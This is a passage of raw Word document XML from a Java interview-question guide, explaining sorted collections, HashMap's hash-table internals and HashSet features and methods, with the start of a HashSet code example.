          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Used when you need a map where keys are sorted, and you need to retrieve data based on sorted keys.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0699AEC6" w14:textId="77777777" w:rsidR="004E1BF9" w:rsidRPr="00CE4B95" w:rsidRDefault="004E1BF9" w:rsidP="00990ADD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8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avigableSet/NavigableMap</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Used when you need additional navigation functionality, such as finding the nearest lower or higher element or key in a sorted collection.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50D29208" w14:textId="77777777" w:rsidR="004E1BF9" w:rsidRPr="00CE4B95" w:rsidRDefault="004E1BF9" w:rsidP="00990AD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summary, </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>sorted collections</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> in Java are essential when you need elements or keys that must be kept in a specific order, whether that's the natural order or a custom order defined by a comparator.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D5F03BF" w14:textId="34592353"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3A88DEA">
          <v:rect id="_x0000_i1579" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="11EFDCF3" w14:textId="77777777" w:rsidR="000217FF" w:rsidRPr="00CE4B95" w:rsidRDefault="000217FF">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="187" w:name="_Toc196307667"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Which data structure is used by HashMap?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="187"/>
    </w:p>
    <w:p w14:paraId="53044E62" w14:textId="6AB7299E" w:rsidR="00132A59" w:rsidRPr="00CE4B95" w:rsidRDefault="00132A59" w:rsidP="00660CA4">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data structure used by HashMap in Java is a </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>hash table</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="673FD6AC" w14:textId="77777777" w:rsidR="00132A59" w:rsidRPr="00CE4B95" w:rsidRDefault="00132A59" w:rsidP="00660CA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ternal Structure of HashMap:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="171B72DB" w14:textId="77777777" w:rsidR="00132A59" w:rsidRPr="00CE4B95" w:rsidRDefault="00132A59" w:rsidP="00660CA4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8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 Table</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: The primary data structure is a hash table (array of buckets or bins). The HashMap stores key-value pairs where each key is hashed using its hashCode() method to determine the bucket index where the corresponding value is stored.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13120464" w14:textId="77777777" w:rsidR="00132A59" w:rsidRPr="00CE4B95" w:rsidRDefault="00132A59" w:rsidP="00660CA4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8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uckets</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: The hash table is internally divided into "buckets." Each bucket is essentially a linked list or a balanced tree (from Java 8 onwards). If multiple keys have the same hash code (i.e., hash collisions occur), the keys are stored in the same bucket, and a collision resolution technique (like linked lists or trees) is applied.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="353F3916" w14:textId="77777777" w:rsidR="00132A59" w:rsidRPr="00CE4B95" w:rsidRDefault="00132A59" w:rsidP="00660CA4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8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ing</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: When a key-value pair is added to the HashMap, the key’s hash code is calculated using the hashCode() method. This hash code is then used to compute an index into the underlying array (the number of buckets).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="557DC2C7" w14:textId="77777777" w:rsidR="00132A59" w:rsidRPr="00CE4B95" w:rsidRDefault="00132A59" w:rsidP="00660CA4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8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llision Handling</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54A63890" w14:textId="77777777" w:rsidR="00132A59" w:rsidRPr="00CE4B95" w:rsidRDefault="00132A59" w:rsidP="00660CA4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="8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fore Java 8</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: In case of a hash collision (when two keys have the same hash code), the entries were stored in a linked list at the same index.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07D4D837" w14:textId="77777777" w:rsidR="00132A59" w:rsidRPr="00CE4B95" w:rsidRDefault="00132A59" w:rsidP="00660CA4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="8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rom Java 8 onwards</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: If the number of collisions becomes large at a specific index (i.e., if the linked list becomes long), the linked list is converted into a balanced tree (like a Red-Black tree), improving search efficiency.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B7758AD" w14:textId="77777777" w:rsidR="00132A59" w:rsidRPr="00CE4B95" w:rsidRDefault="00132A59" w:rsidP="00660CA4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8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ad Factor and Rehashing</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: A HashMap is resized when the number of entries exceeds a certain threshold. This threshold is determined by the </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>load factor</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (default is 0.75). When the threshold is crossed, the HashMap is rehashed, meaning a new larger array of buckets is created and the elements are redistributed among the new buckets.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C919C24" w14:textId="77777777" w:rsidR="00132A59" w:rsidRPr="00CE4B95" w:rsidRDefault="00132A59" w:rsidP="00660CA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Summary:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7920133A" w14:textId="77777777" w:rsidR="00132A59" w:rsidRPr="00CE4B95" w:rsidRDefault="00132A59" w:rsidP="00660CA4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8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internally uses a </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>hash table</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> as its core data structure.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E8E858A" w14:textId="77777777" w:rsidR="00132A59" w:rsidRPr="00CE4B95" w:rsidRDefault="00132A59" w:rsidP="00660CA4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8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keys are hashed, and the hash code determines the bucket where the key-value pair will be stored.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CA5E783" w14:textId="77777777" w:rsidR="00132A59" w:rsidRPr="00CE4B95" w:rsidRDefault="00132A59" w:rsidP="00660CA4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8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llision handling</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is done through linked lists or trees (from Java 8 onward).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23AF410B" w14:textId="77777777" w:rsidR="00132A59" w:rsidRPr="00CE4B95" w:rsidRDefault="00132A59" w:rsidP="00660CA4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8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hashing</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> occurs when the size exceeds a threshold, based on the load factor.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="155EFC2B" w14:textId="77777777" w:rsidR="00132A59" w:rsidRPr="00CE4B95" w:rsidRDefault="00132A59" w:rsidP="00660CA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allows HashMap to provide constant time (O(1)) complexity for most operations like get(), put(), and remove(), although the complexity can degrade to O(n) in the worst-case scenario due to hash collisions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="264F82DD" w14:textId="3CDCA648"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17E7F0C">
          <v:rect id="_x0000_i1580" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="31D15196" w14:textId="23FA6268" w:rsidR="00101830" w:rsidRPr="00CE4B95" w:rsidRDefault="00101830">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="188" w:name="_Toc196307668"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Explain Hash</w:t>
      </w:r>
      <w:r w:rsidR="0018488B" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>S</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>et?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="188"/>
    </w:p>
    <w:p w14:paraId="340E3B2B" w14:textId="707683D8" w:rsidR="00D44F2B" w:rsidRPr="00CE4B95" w:rsidRDefault="00D44F2B">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HashSet in Java is part of the java.util package and implements the Set interface. It is a collection that does </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>not allow duplicate elements</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> and does not maintain any </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>order</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> of its elements. HashSet is backed by a hash table (actually a HashMap), so it provides </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>constant time performance</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (O(1)) for basic operations like add(), remove(), and contains(), assuming the hash function disperses the elements properly.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EE5A8D5" w14:textId="77777777" w:rsidR="00D44F2B" w:rsidRPr="00CE4B95" w:rsidRDefault="00D44F2B" w:rsidP="00D44F2B">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2100B225" w14:textId="77777777" w:rsidR="00D44F2B" w:rsidRPr="00CE4B95" w:rsidRDefault="00D44F2B" w:rsidP="00D44F2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Features of HashSet:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32BF00E5" w14:textId="77777777" w:rsidR="00D44F2B" w:rsidRPr="00CE4B95" w:rsidRDefault="00D44F2B" w:rsidP="00D44F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Duplicates:</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> A HashSet does not allow duplicate elements. If you attempt to add a duplicate, it will not be added to the set.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="649227A8" w14:textId="77777777" w:rsidR="00D44F2B" w:rsidRPr="00CE4B95" w:rsidRDefault="00D44F2B" w:rsidP="00D44F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nordered:</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> The elements in a HashSet are not ordered. There is no guarantee of the order in which elements are stored or retrieved. It may seem random because it is based on hash codes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56084966" w14:textId="77777777" w:rsidR="00D44F2B" w:rsidRPr="00CE4B95" w:rsidRDefault="00D44F2B" w:rsidP="00D44F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llows null values:</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> A HashSet allows at most one null element.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16F4A114" w14:textId="77777777" w:rsidR="00D44F2B" w:rsidRPr="00CE4B95" w:rsidRDefault="00D44F2B" w:rsidP="00D44F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stant Time Complexity:</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Operations like add(), remove(), and contains() have an average time complexity of O(1), making them very efficient.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DE59782" w14:textId="77777777" w:rsidR="009D5767" w:rsidRPr="00CE4B95" w:rsidRDefault="009D5767" w:rsidP="00D44F2B">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="41D439A2" w14:textId="4098B85D" w:rsidR="00D44F2B" w:rsidRPr="00CE4B95" w:rsidRDefault="00D44F2B" w:rsidP="00D44F2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mon Methods:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05B3CCA1" w14:textId="77777777" w:rsidR="00D44F2B" w:rsidRPr="00CE4B95" w:rsidRDefault="00D44F2B" w:rsidP="00D44F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dd(E e):</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Adds the specified element to the set. If the element already exists, it returns false, and the set is unchanged.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DBDE89F" w14:textId="77777777" w:rsidR="00D44F2B" w:rsidRPr="00CE4B95" w:rsidRDefault="00D44F2B" w:rsidP="00D44F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move(Object o):</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Removes the specified element from the set if it exists.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5991F513" w14:textId="77777777" w:rsidR="00D44F2B" w:rsidRPr="00CE4B95" w:rsidRDefault="00D44F2B" w:rsidP="00D44F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tains(Object o):</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Returns true if the set contains the specified element.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F73C786" w14:textId="77777777" w:rsidR="00D44F2B" w:rsidRPr="00CE4B95" w:rsidRDefault="00D44F2B" w:rsidP="00D44F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ize():</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Returns the number of elements in the set.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27BA2F8E" w14:textId="77777777" w:rsidR="00D44F2B" w:rsidRPr="00CE4B95" w:rsidRDefault="00D44F2B" w:rsidP="00D44F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sEmpty():</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Returns true if the set is empty.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CBF2631" w14:textId="77777777" w:rsidR="00D44F2B" w:rsidRPr="00CE4B95" w:rsidRDefault="00D44F2B" w:rsidP="00D44F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lear():</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Removes all elements from the set.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C28E3D8" w14:textId="77777777" w:rsidR="00D44F2B" w:rsidRPr="00CE4B95" w:rsidRDefault="00D44F2B" w:rsidP="00D44F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terator():</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Returns an iterator over the elements in the set.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BC35AA4" w14:textId="77777777" w:rsidR="00A1213D" w:rsidRPr="00CE4B95" w:rsidRDefault="00A1213D" w:rsidP="00D44F2B">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="07B9983C" w14:textId="77777777" w:rsidR="00D44F2B" w:rsidRPr="00CE4B95" w:rsidRDefault="00D44F2B" w:rsidP="00D44F2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384B6651"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HashSet</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FA0FEAD"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E57171B"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SetExamp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E1E1BA3"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416F1DD"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e a HashSet</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F498738"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Se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e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Set</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>&lt;&gt;();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72D56AAC"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="006A4817"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Add elements to the HashSet</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="085C5AB9"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e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pple"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A111FCE"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e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Banana"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
